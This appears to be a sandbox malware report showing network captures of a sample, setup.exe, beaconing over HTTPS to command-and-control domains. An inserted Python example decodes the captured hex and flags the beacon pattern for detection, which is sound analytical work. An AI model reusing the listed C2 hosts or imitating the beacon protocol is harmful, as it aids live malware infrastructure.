                                                                                                                        Jan 6, 2025 15:40:30.290131092 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.321702957 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.321737051 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.321794987 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.322062969 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.322077036 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.831159115 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.831234932 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.832464933 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.832473993 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.832675934 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.833780050 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.833807945 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.833847046 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.320738077 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.320827007 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.320961952 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:31.321073055 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:31.321088076 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.321099043 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:31.321105003 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.379156113 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:31.379196882 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.379261017 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:31.379545927 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:31.379559040 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.095546961 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.095619917 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.097162008 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.097170115 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.097398043 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.098548889 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.143328905 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938003063 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938091993 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938162088 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.938431025 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.938431025 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.938446045 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938458920 CET44349757185.161.251.21192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 15:40:22.017178059 CET | 50664 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 15:40:22.030900955 CET | 53 | 50664 | 1.1.1.1 | 192.168.2.4
Jan 6, 2025 15:40:31.323905945 CET | 54601 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 15:40:31.378531933 CET | 53 | 54601 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 15:40:22.017178059 CET | 192.168.2.4 | 1.1.1.1 | 0x31b7 | Standard query (0) | regularlavhis.click | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:31.323905945 CET | 192.168.2.4 | 1.1.1.1 | 0x6a03 | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 15:40:22.030900955 CET | 1.1.1.1 | 192.168.2.4 | 0x31b7 | No error (0) | regularlavhis.click |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:22.030900955 CET | 1.1.1.1 | 192.168.2.4 | 0x31b7 | No error (0) | regularlavhis.click |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:22.030900955 CET | 1.1.1.1 | 192.168.2.4 | 0x31b7 | No error (0) | regularlavhis.click |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:22.030900955 CET | 1.1.1.1 | 192.168.2.4 | 0x31b7 | No error (0) | regularlavhis.click |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:22.030900955 CET | 1.1.1.1 | 192.168.2.4 | 0x31b7 | No error (0) | regularlavhis.click |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:22.030900955 CET | 1.1.1.1 | 192.168.2.4 | 0x31b7 | No error (0) | regularlavhis.click |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:22.030900955 CET | 1.1.1.1 | 192.168.2.4 | 0x31b7 | No error (0) | regularlavhis.click |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:40:31.378531933 CET | 1.1.1.1 | 192.168.2.4 | 0x6a03 | No error (0) | cegu.shop |  | 185.161.251.21 | A (IP address) | IN (0x0001) | false
                                                                                                                        • regularlavhis.click
                                                                                                                        • cegu.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | 7468 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:22 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: regularlavhis.click
2025-01-06 14:40:22 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-06 14:40:23 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 14:40:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vkg0ikhrqk29imdkft5debvlbv; expires=Fri, 02 May 2025 08:27:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2F29xohQv%2BTAFCf67ybWK6muYmNn75KYpTGGoyp%2B8T8v9FMpNCyQ2VWUNAUD920f8%2BCmfizuqjXjxpcxeFQWVL3CsZ37n1MHx%2BYIcXXEtVIoQd04mi1TaVTNNjMVVQOLSJExO%2FFJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdc767d6f571a48-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1950&rtt_var=741&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1468074&cwnd=157&unsent_bytes=0&cid=f733bd7b2e809b61&ts=627&x=0"
2025-01-06 14:40:23 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-06 14:40:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
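The two sessions captured here show the beacon shape of this sample's C2 traffic: a form-encoded POST to /api with act=life, answered by a chunked body that is just "ok" (the raw bytes 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a are the chunk-size line "2", the payload "ok" and the terminating "0" chunk, which the report renders as "2ok" and "0" once the CR/LFs are dropped), followed by act=recive_message with ver, lid and j parameters and a much larger chunked response. The Python below is an added example, not part of the Joe Sandbox report and not code from the malware: it decodes the Data Raw hex dumps above, de-chunks the response so the real payload and its completeness are visible, and flags request bodies with that beacon shape. The decision rule (act=life alone, or act=recive_message together with ver, lid and j) is a heuristic derived only from this capture, not a published signature, and the truncated response and the benign form post used as contrast are constructed inputs.

```python
"""Added example (not part of the Joe Sandbox report or of the sample):
decode the captured C2 exchange above and flag beacon-shaped POST bodies."""
from __future__ import annotations

from urllib.parse import parse_qs

# Hex dumps copied from the "Data Raw" rows of sessions 0 and 1 above.
S0_REQ_BODY_HEX = "61 63 74 3d 6c 69 66 65"
S0_RESP_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"   # the two IN rows, joined
S1_REQ_BODY_HEX = (
    "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d "
    "34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d "
    "65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 "
    "34 64 61 39 30 37 63 32 64"
)
# Constructed, not from the report: a response cut off inside its first chunk,
# the situation session 1 (chunk size 0x3a88) is in when a capture is partial.
TRUNCATED_RESP = b"3a88\r\n4WLLF/uIQvqHpmSWCMF+"

# The act values seen in this capture. The rule in classify_beacon() is a
# heuristic built from this one capture, not a published signature.
BEACON_ACTS = {"life", "recive_message"}


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' hex dump into bytes."""
    return bytes.fromhex(dump)


def dechunk(body: bytes) -> tuple[bytes, bool]:
    """Decode an HTTP/1.1 chunked body.

    Returns (payload, complete). complete is False when the data ends before
    the zero-length terminating chunk, so a partial capture is not mistaken
    for the whole server message.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return bytes(out), False                  # no chunk-size line left
        size_field = body[pos:eol].split(b";")[0].strip()  # drop chunk extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            return bytes(out), False                  # malformed size line
        pos = eol + 2
        if size == 0:
            return bytes(out), True                   # terminating chunk
        chunk = body[pos:pos + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), False                  # cut off mid-chunk
        pos += size + 2                               # skip the chunk's CRLF


def classify_beacon(body: bytes) -> tuple[bool, str | None, dict[str, str]]:
    """Parse a form-encoded POST body and decide whether it has the shape of
    the beacons in this capture: act=life on its own, or act=recive_message
    accompanied by ver, lid and j. Returns (is_beacon, act, fields)."""
    parsed = parse_qs(body.decode("ascii", "replace"), keep_blank_values=True)
    fields = {key: values[0] for key, values in parsed.items()}
    act = fields.get("act")
    if act not in BEACON_ACTS:
        return False, act, fields
    if act == "recive_message" and not {"ver", "lid", "j"}.issubset(fields):
        return False, act, fields
    return True, act, fields


def analyze_session(req_body_hex: str, resp_hex: str) -> dict:
    """Decode one request/response pair from its 'Data Raw' hex dumps."""
    beacon, act, fields = classify_beacon(hexdump_to_bytes(req_body_hex))
    payload, complete = dechunk(hexdump_to_bytes(resp_hex))
    return {"beacon": beacon, "act": act, "fields": fields,
            "response": payload, "complete": complete}


if __name__ == "__main__":
    print(analyze_session(S0_REQ_BODY_HEX, S0_RESP_HEX))
    print(classify_beacon(hexdump_to_bytes(S1_REQ_BODY_HEX)))
    print(dechunk(TRUNCATED_RESP))
```

The completeness flag matters when reading the session 1 rows that follow: the first IN chunk announces 0x3a88 bytes, so the payload can only be judged once every 1369-byte segment has been reassembled, and a rule that keys on the first few hundred bytes of a "Data Ascii" row is looking at a fragment, not the message.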


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | 7468 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:40:23 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 78
Host: regularlavhis.click
2025-01-06 14:40:23 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d
2025-01-06 14:40:24 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 14:40:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=lgiqddhfl7rictl259bn6e6egv; expires=Fri, 02 May 2025 08:27:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMRlVY4gQIUI%2FfNYL4%2FoZ%2Bhm8fkZMd9yBfkyv%2BNC0IO%2BE%2BHaOoWjNUZD1mbA6oYwWpZAfLcMeVWcfCAQVBMiXZ0cOHJxbzX%2B0kdyjgJZ3f%2FJO1X%2F2EEybpc4BRROvrkF3YKHDdyw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fdc76840f3f4363-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1548&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=981&delivery_rate=1790312&cwnd=238&unsent_bytes=0&cid=8d21162afdf375b5&ts=475&x=0"
2025-01-06 14:40:24 UTC | 232 | IN | Data Raw: 33 61 38 38 0d 0a 34 57 4c 4c 46 2f 75 49 51 76 71 48 70 6d 53 57 43 4d 46 2b 4f 75 6c 6e 71 47 70 71 66 43 4f 2b 52 30 39 67 66 53 31 72 35 4e 57 61 51 4c 30 31 77 62 78 75 32 50 54 44 52 71 78 75 6f 42 4a 4a 6a 45 75 4b 43 77 35 65 47 64 67 6d 49 78 4d 59 41 55 6d 53 75 4d 4e 59 72 58 61 58 2b 79 66 57 70 63 4d 63 74 44 4b 61 42 52 69 4d 43 59 70 51 53 42 6c 4a 33 43 59 6a 41 68 78 47 42 4a 53 35 67 67 71 6e 63 4a 50 74 49 5a 37 6d 79 67 6e 7a 62 61 51 66 55 49 63 4f 78 51 49 48 58 67 2b 63 49 6a 56 43 52 77 38 6d 67 61 47 41 4c 36 70 6b 6b 4b 6f 2f 31 76 79 45 41 66 67 71 2b 31 78 62 6a 41 58 45 44 41 34 58 53 39 59 76 4b 77 4d 5a 52 78 75 4e 73 34 6b 4b 71 58 4f 53 35 79 69 4b 36 38
Data Ascii: 3a884WLLF/uIQvqHpmSWCMF+OulnqGpqfCO+R09gfS1r5NWaQL01wbxu2PTDRqxuoBJJjEuKCw5eGdgmIxMYAUmSuMNYrXaX+yfWpcMctDKaBRiMCYpQSBlJ3CYjAhxGBJS5ggqncJPtIZ7mygnzbaQfUIcOxQIHXg+cIjVCRw8mgaGAL6pkkKo/1vyEAfgq+1xbjAXEDA4XS9YvKwMZRxuNs4kKqXOS5yiK68
2025-01-06 14:40:24 UTC | 1369 | IN | Data Raw: 41 4f 2b 47 75 75 48 78 6a 46 52 63 30 51 53 45 59 42 6a 78 63 75 45 77 35 61 42 4a 61 78 77 78 2f 6e 62 4e 6e 74 4c 4e 69 39 68 41 37 34 5a 4b 59 66 56 34 77 45 79 68 6f 48 48 6b 4c 55 4c 53 6b 49 45 45 41 47 69 4c 32 45 43 4b 42 79 6c 75 30 6f 6e 75 72 48 52 72 6f 71 70 41 51 59 30 30 58 71 47 41 73 64 56 64 45 30 62 52 31 52 56 6b 6d 42 75 38 4e 59 36 58 4f 58 36 79 32 59 39 38 77 4e 2f 32 2b 78 46 31 47 47 43 4d 6f 46 41 68 46 43 33 43 49 6e 43 42 42 46 44 59 75 36 68 51 43 70 4e 64 65 71 4a 34 43 6c 6e 45 62 58 62 37 4d 62 56 4a 31 48 38 45 67 58 55 46 69 63 49 69 46 43 52 77 38 42 67 37 53 41 43 36 5a 32 6b 65 45 79 6d 50 66 43 43 2f 46 34 70 52 6c 57 67 51 62 59 41 67 59 59 51 74 55 75 4a 41 63 59 53 30 6e 49 39 34 51 59 36 53 33 5a 79 79 32 54 36
Data Ascii: AO+GuuHxjFRc0QSEYBjxcuEw5aBJaxwx/nbNntLNi9hA74ZKYfV4wEyhoHHkLULSkIEEAGiL2ECKBylu0onurHRroqpAQY00XqGAsdVdE0bR1RVkmBu8NY6XOX6y2Y98wN/2+xF1GGCMoFAhFC3CInCBBFDYu6hQCpNdeqJ4ClnEbXb7MbVJ1H8EgXUFicIiFCRw8Bg7SAC6Z2keEymPfCC/F4pRlWgQbYAgYYQtUuJAcYS0nI94QY6S3Zyy2T6
2025-01-06 14:40:24 UTC | 1369 | IN | Data Raw: 72 71 51 35 4b 69 77 6e 59 42 41 49 59 54 74 45 70 62 55 78 66 53 42 48 47 37 38 4d 71 71 6d 47 61 34 47 4b 74 35 73 6f 49 38 33 7a 6a 41 78 61 53 52 63 30 45 53 45 59 42 30 53 51 6c 42 41 31 41 42 49 57 35 6a 51 2b 73 65 70 48 71 49 4a 58 67 77 41 33 2f 61 61 34 59 53 6f 45 46 77 67 30 4a 46 45 75 63 61 32 30 46 42 77 39 52 78 6f 61 55 43 2b 74 41 6d 75 51 75 6e 2f 4f 45 47 62 70 7a 34 78 74 55 79 31 32 4b 42 51 41 62 52 4e 4d 6b 4a 77 77 61 52 51 57 4f 75 59 41 53 70 6e 47 5a 35 69 69 53 36 4d 6f 43 2f 47 4f 6f 46 31 36 4c 42 4d 42 49 52 6c 35 47 78 47 56 31 51 69 74 49 42 59 75 34 77 54 57 71 65 35 66 74 4e 74 6a 36 69 68 2b 30 62 61 39 63 41 4d 73 4a 77 77 67 44 46 45 58 63 49 69 41 48 48 45 67 4b 69 37 43 4a 44 71 35 78 6c 65 4d 74 6e 75 58 44 41 76
Data Ascii: rqQ5KiwnYBAIYTtEpbUxfSBHG78MqqmGa4GKt5soI83zjAxaSRc0ESEYB0SQlBA1ABIW5jQ+sepHqIJXgwA3/aa4YSoEFwg0JFEuca20FBw9RxoaUC+tAmuQun/OEGbpz4xtUy12KBQAbRNMkJwwaRQWOuYASpnGZ5iiS6MoC/GOoF16LBMBIRl5GxGV1QitIBYu4wTWqe5ftNtj6ih+0ba9cAMsJwwgDFEXcIiAHHEgKi7CJDq5xleMtnuXDAv
2025-01-06 14:40:24 UTC | 1369 | IN | Data Raw: 41 4d 73 4f 2f 77 59 65 58 6c 36 53 50 47 30 46 45 77 39 52 78 72 36 4b 45 71 64 37 6b 4f 63 6d 6b 4f 4c 4b 43 2f 39 73 71 42 74 66 6a 51 6a 43 42 51 30 64 51 4e 67 76 50 77 45 55 52 51 53 4d 39 38 31 41 72 6d 33 5a 73 6d 43 2f 36 65 30 57 37 33 69 31 58 45 66 46 48 49 6f 50 42 46 34 5a 6e 43 59 69 43 78 42 48 41 59 6d 34 68 77 36 76 63 35 54 76 4c 35 4c 33 7a 41 6a 35 59 61 77 58 53 6f 73 49 7a 67 51 4d 46 6b 72 57 5a 57 4e 43 47 46 64 4a 33 76 65 32 44 61 5a 31 6d 76 78 67 68 36 76 64 52 76 4e 6d 34 30 51 59 68 77 76 4b 42 77 51 53 53 74 51 6b 49 51 77 59 53 67 43 4f 76 35 45 42 72 58 32 59 35 43 2b 5a 34 63 45 44 38 47 32 6e 47 6c 66 4c 53 34 6f 50 45 46 34 5a 6e 41 6f 4b 4e 31 31 75 4d 38 61 6f 7a 52 6e 70 63 70 57 71 65 4e 6a 70 78 77 72 38 5a 61 55
Data Ascii: AMsO/wYeXl6SPG0FEw9Rxr6KEqd7kOcmkOLKC/9sqBtfjQjCBQ0dQNgvPwEURQSM981Arm3ZsmC/6e0W73i1XEfFHIoPBF4ZnCYiCxBHAYm4hw6vc5TvL5L3zAj5YawXSosIzgQMFkrWZWNCGFdJ3ve2DaZ1mvxgh6vdRvNm40QYhwvKBwQSStQkIQwYSgCOv5EBrX2Y5C+Z4cED8G2nGlfLS4oPEF4ZnAoKN11uM8aozRnpcpWqeNjpxwr8ZaU
2025-01-06 14:40:24 UTC | 1369 | IN | Data Raw: 5a 4a 49 41 68 56 46 33 79 45 6f 44 52 35 4f 44 35 53 77 69 68 4b 6e 65 4a 62 69 4b 4a 48 6b 77 41 50 35 62 4b 38 57 57 59 77 4c 78 41 42 49 55 41 48 62 50 57 31 61 58 32 34 5a 6e 61 57 56 44 59 68 34 6c 71 6f 2f 31 76 79 45 41 66 67 71 2b 31 78 52 6d 51 48 48 47 67 45 5a 54 39 4d 6d 50 77 4d 53 52 42 75 42 75 49 63 48 70 58 4f 57 37 43 47 64 37 38 67 42 38 57 47 73 45 42 6a 46 52 63 30 51 53 45 59 42 38 69 34 2b 46 52 78 42 41 70 43 73 77 78 2f 6e 62 4e 6e 74 4c 4e 69 39 68 41 58 2f 59 61 63 63 56 49 73 42 78 77 67 61 45 55 62 62 4c 43 59 51 46 55 67 4f 6a 62 2b 49 44 36 39 6e 6c 65 51 79 6e 66 66 57 52 72 6f 71 70 41 51 59 30 30 58 38 44 78 67 4f 51 70 34 55 4f 77 45 4a 52 41 53 4b 39 35 78 4f 73 44 57 65 35 6d 44 41 70 63 49 4a 2f 57 6d 73 48 56 47 48
Data Ascii: ZJIAhVF3yEoDR5OD5SwihKneJbiKJHkwAP5bK8WWYwLxABIUAHbPW1aX24ZnaWVDYh4lqo/1vyEAfgq+1xRmQHHGgEZT9MmPwMSRBuBuIcHpXOW7CGd78gB8WGsEBjFRc0QSEYB8i4+FRxBApCswx/nbNntLNi9hAX/YaccVIsBxwgaEUbbLCYQFUgOjb+ID69nleQynffWRroqpAQY00X8DxgOQp4UOwEJRASK95xOsDWe5mDApcIJ/WmsHVGH
2025-01-06 14:40:24 UTC | 1369 | IN | Data Raw: 68 47 41 65 51 75 49 7a 41 63 56 45 6d 5a 2b 5a 70 41 72 6e 6e 5a 73 6d 43 62 34 73 63 48 2f 6d 4f 76 45 31 2b 50 46 38 41 50 47 68 39 41 31 79 67 68 41 68 4a 43 41 34 65 2b 6a 67 79 6b 63 70 37 6c 4a 64 69 72 68 41 48 73 4b 76 74 63 65 59 59 4f 78 6c 4e 53 58 6c 36 53 50 47 30 46 45 77 39 52 78 72 65 4a 42 61 4e 34 6d 75 55 6a 69 75 54 43 46 50 52 6e 71 51 35 53 67 41 44 48 42 51 55 64 52 39 6f 75 49 52 41 57 54 77 71 4e 39 38 31 41 72 6d 33 5a 73 6d 43 37 38 74 49 4d 38 32 61 31 46 31 6d 49 45 38 63 59 53 46 41 42 7a 53 49 38 51 6b 64 5a 47 5a 47 77 6e 45 36 77 4e 5a 37 6d 59 4d 43 6c 77 67 2f 79 62 61 55 53 53 6f 34 44 78 51 63 42 46 30 58 55 4a 69 30 47 47 30 67 4d 68 62 75 49 42 36 70 36 6e 65 4d 75 6b 65 71 45 53 4c 52 74 75 31 77 41 79 79 54 52 43
Data Ascii: hGAeQuIzAcVEmZ+ZpArnnZsmCb4scH/mOvE1+PF8APGh9A1yghAhJCA4e+jgykcp7lJdirhAHsKvtceYYOxlNSXl6SPG0FEw9RxreJBaN4muUjiuTCFPRnqQ5SgADHBQUdR9ouIRAWTwqN981Arm3ZsmC78tIM82a1F1mIE8cYSFABzSI8QkdZGZGwnE6wNZ7mYMClwg/ybaUSSo4DxQcBF0XUJi0GG0gMhbuIB6p6neMukeqESLRtu1wAyyTRC
2025-01-06 14:40:24 UTC | 1369 | IN | Data Raw: 64 4e 79 34 4c 58 77 46 4a 67 61 2f 44 57 4f 6c 56 6b 76 77 6c 6e 2f 4f 47 4d 2f 64 6b 72 52 74 4f 79 78 72 31 52 6b 67 66 41 59 51 63 4e 45 49 4a 44 31 48 55 2b 63 4d 53 36 53 33 5a 72 53 4f 4b 39 38 49 46 34 6d 6e 6b 49 6d 61 73 45 38 41 50 47 42 6c 57 30 32 56 6a 51 68 41 50 55 62 2f 33 69 67 65 79 5a 49 2f 6e 4d 4a 2b 6c 2b 30 69 30 63 75 4e 45 47 4c 34 47 78 41 59 50 43 46 43 52 41 6a 73 49 47 46 38 4f 6b 62 6a 44 54 75 6c 7a 32 62 4a 7a 31 71 58 41 46 37 51 79 38 30 34 44 33 6c 61 64 57 46 6f 42 44 38 56 6c 4f 30 4a 48 48 55 66 47 70 63 4e 59 36 54 4b 61 2b 44 4b 65 35 74 49 46 73 31 53 64 4f 30 4b 47 41 39 30 5a 4e 69 42 47 78 69 67 72 46 51 34 44 48 49 57 35 6a 51 65 2f 4e 64 65 71 4c 39 69 39 2f 55 61 38 4b 70 78 53 47 4a 4e 46 6b 6b 67 39 48 55
                                                                                                                        Data Ascii: dNy4LXwFJga/DWOlVkvwln/OGM/dkrRtOyxr1RkgfAYQcNEIJD1HU+cMS6S3ZrSOK98IF4mnkImasE8APGBlW02VjQhAPUb/3igeyZI/nMJ+l+0i0cuNEGL4GxAYPCFCRAjsIGF8OkbjDTulz2bJz1qXAF7Qy804D3ladWFoBD8VlO0JHHUfGpcNY6TKa+DKe5tIFs1SdO0KGA90ZNiBGxigrFQ4DHIW5jQe/NdeqL9i9/Ua8KpxSGJNFkkg9HU
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 47 31 39 5a 53 64 37 6c 7a 55 43 37 4e 63 47 71 5a 35 76 33 31 67 44 33 66 4b 42 62 5a 72 55 69 78 41 38 4a 43 46 48 4c 4b 68 4d 38 43 6b 77 48 69 4c 43 56 45 65 6b 37 32 65 56 67 77 4e 79 45 54 72 52 56 37 56 78 41 79 31 32 4b 50 51 73 51 54 39 73 7a 50 45 38 34 51 51 36 48 6f 5a 4d 58 70 6a 58 58 71 69 62 59 76 5a 5a 49 74 47 36 79 58 41 44 62 56 35 46 64 57 30 6b 52 6a 6a 70 6a 47 31 39 5a 53 64 37 6c 7a 55 43 37 4e 63 47 71 5a 35 76 33 31 67 44 33 66 4b 42 62 5a 72 55 69 78 41 38 4a 43 46 48 4c 4b 6d 49 73 4b 57 34 33 75 4b 4b 41 44 71 64 79 6a 2f 74 67 31 71 58 4c 52 71 78 54 34 31 51 59 74 45 75 4b 45 45 68 47 41 65 6b 6d 49 77 77 59 57 52 6a 4c 6b 49 30 48 71 47 4f 4a 2f 53 2f 58 79 2f 49 6e 74 43 54 6a 47 68 6a 54 56 34 52 49 44 41 38 42 68 48 56
                                                                                                                        Data Ascii: G19ZSd7lzUC7NcGqZ5v31gD3fKBbZrUixA8JCFHLKhM8CkwHiLCVEek72eVgwNyETrRV7VxAy12KPQsQT9szPE84QQ6HoZMXpjXXqibYvZZItG6yXADbV5FdW0kRjjpjG19ZSd7lzUC7NcGqZ5v31gD3fKBbZrUixA8JCFHLKmIsKW43uKKADqdyj/tg1qXLRqxT41QYtEuKEEhGAekmIwwYWRjLkI0HqGOJ/S/Xy/IntCTjGhjTV4RIDA8BhHV
